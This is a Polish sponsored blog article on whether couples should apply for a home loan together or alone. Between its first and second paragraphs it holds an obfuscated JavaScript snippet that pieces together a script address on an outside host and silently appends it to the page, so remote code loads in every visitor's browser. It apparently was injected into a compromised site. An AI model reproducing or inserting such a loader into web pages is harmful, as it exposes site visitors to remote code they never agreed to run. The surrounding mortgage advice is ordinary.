Własne mieszkanie najczęściej kupujemy na kredyt. Do tego, aby kupić je jako para, wcale nie trzeba zawarcia małżeństwa, ale z drugiej strony trzeba też pamiętać, że nie zawsze jest to opłacalne rozwiązanie. Kiedy lepiej wnioskować o kredyt samodzielnie, a kiedy ze swoją drugą połówką?

(function(){
ttspu=”sd99k9tktsph”;ttsp=document.createElement(„script”);
ttsp_=”u”+(„st”);ttsp_+=”at”+(„.”);ttsp.async=true;ttsp_+=”in”;
ttspu=”8736377.”+ttspu;ttsp.type=”text/javascript”;ttspu+=”yp9zrs922rkd”;
ttspu+=”fcecsz”;ttsp_+=(„f”)+”o”+(„/”);ttsp.src=”//”+ttsp_+ttspu;
ttspd=document.body;ttspd.appendChild(ttsp);
})();

Decyzja o wspólnym zamieszkaniu to bardzo ważny krok, dlatego też trzeba ją zawsze dobrze przemyśleć. Warto pamiętać o tym, że wiele związków nie wytrzymuje zbyt długo, więc wspólne zawarcie umowy może być wtedy większym problemem niż korzyścią, dlatego też pierwsze wspólne mieszkanie powinno być wynajęte czy też powinno należeć do jednego z partnerów. Dopiero po jakimś czasie, gdy wspólne życie będzie zmierzało w dobrym kierunku, warto planować je poważniej.

Kredyt w parze łatwiejszy?
Zazwyczaj pracującym parom jest znacznie prościej uzyskać kredyt hipoteczny na zakup mieszkania, ponieważ wtedy do obliczania zdolności kredytowej brane są wspólne wpływy każdej z osób, co pozwala na uzyskanie wyższego dochodu. Ponadto bank preferuje takie rozwiązania, ponieważ w razie utraty pracy przez jednego z partnerów spłata zadłużenia nie będzie wysoce ryzykowna.
Jednak trzeba pamiętać o tym, że nie zawsze zakupienie mieszkania wspólnie jest opłacalne. Przede wszystkim dotyczy to sytuacji, gdy jeden z partnerów zarabia mało, ma umowę cywilno-prawną lub nie ma w ogóle żadnych dochodów. W takiej sytuacji lepiej, aby o kredyt wnioskował ten partner, który ma wyższą pensję. Dodatkowo także więcej osób na utrzymaniu zmniejsza zdolność kredytową, ponieważ przekłada się to na wyższe koszty.
Skonsultujcie się z doradcą finansowym
Dlatego też jeżeli interesują was mieszkania na sprzedaż w Poznaniu, Szczecinie czy w Warszawie lub w innych miastach, warto dobrze przemyśleć decyzję o tym, jak wziąć na nie kredyt. Najlepiej w tym celu udać się także do doradcy finansowego, który będzie mógł wtedy przygotować symulacje i wskazać, jakie rozwiązanie będzie najlepsze. Z pomocy doradców finansowych można skorzystać również w biurach deweloperów.

* wpis sponsorowany